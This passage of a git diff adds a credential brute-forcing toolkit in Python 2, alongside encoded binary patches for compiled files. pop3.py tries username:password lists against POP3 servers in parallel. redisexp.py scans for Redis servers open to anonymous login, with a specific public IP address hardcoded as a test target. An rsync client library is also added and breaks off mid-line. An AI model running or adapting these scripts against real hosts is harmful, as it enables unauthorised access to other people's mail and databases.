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 literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/pop3.py b/Bruteforce/plugins/pop3.py new file mode 100644 index 0000000..dab169e --- /dev/null +++ b/Bruteforce/plugins/pop3.py @@ -0,0 +1,61 @@ +#coding=utf-8 +import time +from printers import printPink,printGreen +import threading +from multiprocessing.dummy import Pool +import poplib + +def pop3_Connection(ip,username,password,port): + try: + pp = poplib.POP3(ip) + #pp.set_debuglevel(1) + pp.user(username) + pp.pass_(password) + (mailCount,size) = pp.stat() + pp.quit() + if mailCount: + lock.acquire() + printGreen("%s pop3 at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + result.append("%s pop3 at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + lock.release() + except Exception,e: + print e + lock.acquire() + print "%s pop3 service 's %s:%s login fail " %(ip,username,password) + lock.release() + pass + +def pop3_l(ip,port): + try: + d=open('conf/pop3.conf','r') + data=d.readline().strip('\r\n') + while(data): + username=data.split(':')[0] + password=data.split(':')[1] + pop3_Connection(ip,username,password,port) + data=d.readline().strip('\r\n') + except Exception,e: + print e + pass + +def pop_main(ipdict,threads): + printPink("crack pop now...") + print "[*] start crack pop %s" % time.ctime() + starttime=time.time() + + global lock + lock = threading.Lock() + global result + result=[] + + pool=Pool(threads) + + for ip in ipdict['pop3']: + pool.apply_async(func=pop3_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + + pool.close() + pool.join() + + print "[*] stop pop serice %s" % time.ctime() + print "[*] crack pop done,it has Elapsed time:%s " % (time.time()-starttime) + return result \ No newline at end of file diff --git a/Bruteforce/plugins/pop3.pyc b/Bruteforce/plugins/pop3.pyc new file mode 100644 index 0000000000000000000000000000000000000000..4c78f08539976cf0b0f5f091300058d343d0c326 GIT binary patch literal 2301 zcmbtVU2hvj6uqCBpxbMA%&gf*&QeAtYU61I zE^5-CNr_KCBYumLhBzyfEQ!Dt{%{pwW`F9gZkLXIKu$qhX!a`N+t7gfsrfAOfsN07G9j@V zAEYi&yx9^x`r>Mr1c}ljevQ_vv3USRPl3rnw}xZ(?Z>cNHYoC9H;7yS_aw5xxsFb? z35v+t^Sn&%-~X_Bw(Nr~+iBT%uC21V{639!@SeqL39Q_z;+##=%E|Kh)Gc9B6r-=yp+LwXOKm5alju=VXp_ja zQfE4{T4=EUJl2Ivb0Z{iOpmkx1Vp^GiN;zQi(|^hMP53YSrigujC1Ve6H{el(;u|s z40IQU#MqDE^}a$x+dEG)o12~kyKHZ$&GE@3GRHQKjL~He73guLcZ#W7#Ul2P_HvBH zoF#MBz70dFrdGX<>Zn_)r5bqesZF(}R+SH*`(i!|SB1+bto;qn^paT%4uJrdAR}nt zF^R!Ma5t$5m233;DS>|Fk8DBX>dxVsZ7|KRcQw%E^L=49!TQ4gI{5aguxHzJcxdi| zo4#=K1-RM3+y=O57Odl(`}PKGoSR`)4fdp{rR8IFTGDus!l#sr-DS81og6p|W~Gjj zEHzsAV_gYcxfB*GbK#rtLf)gx+l5@}@D_~3O(akfxhTBJ18Z#7VO|%}In8&EvbPY; za!3JE-BC^ThWs`KLIIDnWvLSIeuq;bC+g>Mra%n1@!f?l7y?fRctmR=pN?@S8U)f; zqI3aZ2aFVO-uV1kUqlPjMN~m$01Pz*jMxHV0yTvLDcyjSykcOPHZVTqBs_K2r$c5& zhf`AQ-4HKn{wvd@B~3{d6uDao&p~$u$Lm`zbX-R9DXUEonEZTaXU8&D-)uh%aPvzS zTpQoA^ZQs-YB8LcSbC!J*oGTec14hDQ4pHL<2JG=L6YqDe21&pNpAE9sS~N&&!WQW zByj0ivwC%fEm%?!j=P0fxS{YEF?Yh`OUz+*~y9iK-%JIrNG@L!&%3T_%QzT3RG&>_pV6Ev;-Xg_2}=Ndcu1g1;_%mnB$n z1idrw!?*Wf2vW1E+O@XV@Y>#*dhE4S%UcDPMcG6C4pb7#A6y7v$csdx!*_X%?}SB# zv~zdhjv?4-QRcC>76sf%Cgbt6su{BbWk~ceVpT`6^N9<&Xw`KN*yFF&)j`Gkf9lJp e{dAlslT1Hk$Sli4Tdk`$em5b!ZLfK|+4%>T0nk+zTSBh z(c_fXw!#e3Y zO&Sze=tP}PG-=peZqcG)i{dJMg}u&ET$4td;<_|C?8Z*70hi3*_-ysqP1l6T3zNES zlkU6LvbR}io%R&3s6cFISz=f<;$9tJ*82os`wIjtA6IDpF*%|Mj^@!3q)$g4yL*HM zRXXzNgeu2qRH?Yf?m;Cb?oK>Rk=jkaq>A%tzeUAQq>gcXY(A;-365&K$@+;$#Si3a zG^vY9++ge23_Fc{THAcUbB%JY$vYhU{QUBkEca>Ty|DJ2c%$gEqY8r5#+kMZM0xs| z)rI5J=b^QSSrJQ2_A=|Fk!OW794gCt{f+I#s{V$369czwH^6o2ISw6nw_-Yo0T$S5N zX0=@M{b!NRoyk(iI~H1&j!YVdNg~HcvS?oh!{}gU77GfU=+NpO+Z9EV%Z411G@R;y zc?fDeE87(zjPM5WQ^z6EJqQwE-$iTi2#R)aXcC*H0|%_^V5HOW-YiVVHVP4fVvv}p zgJsD2`P^NA;Ci6}6^X>Jq+9uZ3O<;}sRLM|^?os8D+y z&dvW~UV#;O1z5+R)?<9ZB8ZH^E3o$I*{{rQ@h8iPzsNrTy$-tmHB`e;m5E^_A%QxK zRR|y>I1>;IXpy?ia)b7P@;9{28GwFG`o9w{V1X|#Ep9I97Hgvlt+76`bb|c;k4YG4 z3;$yJWd}Ogpxxc{DsrtOxpqaV<2u}`)8>N|DG(D@i#)-|i({iC90#wV_bMP~JQtAf+(6rkQJ}q|R)O|q{H&^u zYO9LZ2G-Zq8;}*q6;&+(=UAMU<=@aL>6X{RBivJ2XSqnCEu4dS6x<1(6ojHmV@SY? za*Np#{vjiXTv-3~@fO!eCSD#P<`cA|qRNBBMAlddkgvP;%O)DA--=7`33=*Zi+0&o zM_A?7d1(Rb=RJ*E(iLZsoma~WztcO1<84{K^N35%S;b7V!+yVS*D&+>#^bJaVd2hZ zQC!P6=KOvV=2pjD z=8|iFPhf){1=k_Ux+%~~Ip1T-O*$5j9-=0f1oKN0aK<@4Iz%m^XQBA}6KZ$!=C22nm(=!74dQv*f|6V4HLBw17`TlfI7u z2`vHQ71j3JUd?NJ7u7>lZ63L-B>yEs0lQFM8~>w%_anf-BA*$7DYDt*MHXpm5xIUm zn@;CtusFvpf~cM2+{IfM>ru$rkK4#*F5rhP;E+lIkzfXQ&^u(!H5T85SNu1{WXp#oe3h^*dNMC>isH$JJqgZydu@&X`a7w+~_FVfM`8G;} zS_vr?|1giQ@S8b5j;bFJxK3_7JKmk0-|TPZHuc-${I9o+Dd8e3E_NL~Pu?8qYvg4~FOWA+dXcx z+oK3~MiJhaM2Nf` zgNq;(wcYRb2hljc$SM`^L_b3ym^horBOH1uP9i5K zC7DT+hqPqKo8@#d{8@oNC-AcZA87%6qy_Mi7QjbZ03T@qe53{Nkru#5TGk~k8>EhM z>m0)@#O_abez6kOtVZWEKk9F9;P1wge>~|CPu@3t;3Hw-w z{eHrp)Dase9q}XjxmZJJaLF8oxtH67V)-ZE4^Ml>_wBq4dVPJ~;~_gN)LP|)U5328qRQpEy#{TxfXBR|c#^LtR>&{~yDFDtyLdj2 zm@WbbSM zE@SG~XP3&wLJleV6k^8tH-ByBJU_g)h)34GLLo|fK?%ObF*($63C1nfQnXd6YC?(e zntH@?aX!ac73`561ZNV9T7pe&LF9M~0o*fDGzF}ZNx`m+z5(Y#EOM5e=^|3w41pmk z=IR8D+QD!dK$zSD+{ks_VoSD)}KuF1y@Rj#N;t6uWC#c`q&rnqY^|I^4lbplVc|Jd0jszX+6{;Vy#0E!TtC`xp1=_{ zzKqEbS=~Rka=aIVz#7FH3wfqh>5AJ_p0{KklC$KjyaO+n%>?i0Bthv)6*PMbC^!2F zP{pUBzF;x^;CJEnF`i-YYfk1J!T-O*`fMEjm#p1p@fC~dqv5V`fG2SjF}eAS6nA08 zF~o0~?x}s+AM~W)nJ%UmzYt_D=S4{q;wn07mi+ztVXNs^^Ys$0468$9qt#4UM^np6 zHPmS8TU97mpZG{6F-&DST+5YNz`bZ#!E)Q-#R*$n!d&VJBbPeYLc%nz1$7fYs9O+n z%c&T9WOX&}ZtMo-;iEqMxZ%Z|lVibeQ+W-}!OxHJ-R~i{tmq!ZwzJ@V?5uBQ)7kVw aW-Y$axWjwR=-Zh|ZMqBTY$}_{X8r~(ev$70 literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/redisexp.py b/Bruteforce/plugins/redisexp.py new file mode 100644 index 0000000..89a5a45 --- /dev/null +++ b/Bruteforce/plugins/redisexp.py @@ -0,0 +1,66 @@ +#coding=utf-8 +import time +import threading +from threading import Thread +from printers import printPink,printGreen +from Queue import Queue +import redis + +class redis_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + #self.lines=self.config.file2list("conf/redis.conf") + self.sp=Queue() + + def redisexp(self): + while True: + ip,port=self.sp.get() + try: + r=redis.Redis(host=ip,port=port,db=0,socket_timeout=8) + r.dbsize() + self.lock.acquire() + printGreen('%s redis service at %s allow login Anonymous login!!\r\n' %(ip,port)) + self.result.append('%s redis service at %s allow login Anonymous login!!\r\n' %(ip,port)) + self.lock.release() + except Exception,e: + pass + self.sp.task_done() + + + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['redis']): + printPink("crack redis now...") + print "[*] start crack redis %s" % time.ctime() + starttime=time.time() + + for i in xrange(threads): + t = Thread(target=self.redisexp) + t.setDaemon(True) + t.start() + + for ip in ipdict['redis']: + self.sp.put((str(ip).split(':')[0],int(str(ip).split(':')[1]))) + + self.sp.join() + + + print "[*] stop redis serice %s" % time.ctime() + print "[*] crack redis done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + +if __name__ == '__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'redis': ['101.201.177.35:6379']} + pinglist=['101.201.177.35'] + test=redis_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") + diff --git a/Bruteforce/plugins/redisexp.pyc b/Bruteforce/plugins/redisexp.pyc new file mode 100644 index 0000000000000000000000000000000000000000..96f0a60973e1f91a058469c607d9612083ead25e GIT binary patch literal 2744 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 literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/rsynclib.py b/Bruteforce/plugins/rsynclib.py new file mode 100644 index 0000000..816cf67 --- /dev/null +++ b/Bruteforce/plugins/rsynclib.py @@ -0,0 +1,194 @@ +import base64 +import re +try: + import hashlib + hash_md4 = hashlib.new("md4") + hash_md5 = hashlib.md5() +except ImportError: + # for Python << 2.5 + import md4 + import md5 + hash_md4 = md4.new() + hash_md5 = md5.new() + +# Import SOCKS module if it exists, else standard socket module socket +try: + import SOCKS; socket = SOCKS; del SOCKS # import SOCKS as socket + from socket import getfqdn; socket.getfqdn = getfqdn; del getfqdn +except ImportError: + import socket +from socket import _GLOBAL_DEFAULT_TIMEOUT + +__all__ = ["rsync"] + + + +# The standard rsync server control port +RSYNC_PORT = 873 +# The sizehint parameter passed to readline() calls +MAXLINE = 8192 +protocol_version = 0 + +# Exception raised when an error or invalid response is received +class Error(Exception): pass + +# All exceptions (hopefully) that may be raised here and that aren't +# (always) programming errors on our side +all_errors = (Error, IOError, EOFError) + + +# Line terminators for rsync +CRLF = '\r\n' +LF = '\n' + +# The class itself +class rsync: + '''An rsync client class. + + To create a connection, call the class using these arguments: + host, module, user, passwd + + All arguments are strings, and have default value ''. + Then use self.connect() with optional host and port argument. + ''' + debugging = 0 + host = '' + port = RSYNC_PORT + maxline = MAXLINE + sock = None + file = None + server_protocol_version = None + + # Initialization method (called by class instantiation). + # Initialize host to localhost, port to standard rsync port + # Optional arguments are host (for connect()), + # and module, user, passwd (for login()) + def __init__(self, host='', module='', user='', passwd='',port=873, + timeout=_GLOBAL_DEFAULT_TIMEOUT): + self.timeout = timeout + if host: + self.connect(host) + if module and user and passwd: + self.login(module, user, passwd) + + def connect(self, host='', port=0, timeout=-999): + '''Connect to host. Arguments are: + - host: hostname to connect to (string, default previous host) + - port: port to connect to (integer, default previous port) + ''' + if host != '': + self.host = host + if port > 0: + self.port = port + if timeout != -999: + self.timeout = timeout + self.sock = socket.create_connection((self.host, self.port), self.timeout) + self.af = self.sock.family + self.file = self.sock.makefile('rb') + self.server_protocol_version = self.getresp() + self.protocol_version = self.server_protocol_version[-2:] + return self.server_protocol_version + + + def set_debuglevel(self, level): + '''Set the debugging level. + The required argument level means: + 0: no debugging output (default) + 1: print commands and responses but not body text etc. + ''' + self.debugging = level + debug = set_debuglevel + + # Internal: send one line to the server, appending LF + def putline(self, line): + line = line + LF + if self.debugging > 1: print '*put*', line + self.sock.sendall(line) + + # Internal: return one line from the server, stripping LF. + # Raise EOFError if the connection is closed + def getline(self): + line = self.file.readline(self.maxline + 1) + if len(line) > self.maxline: + raise Error("got more than %d bytes" % self.maxline) + if self.debugging > 1: + print '*get*', line + if not line: raise EOFError + if line[-2:] == CRLF: line = line[:-2] + elif line[-1:] in 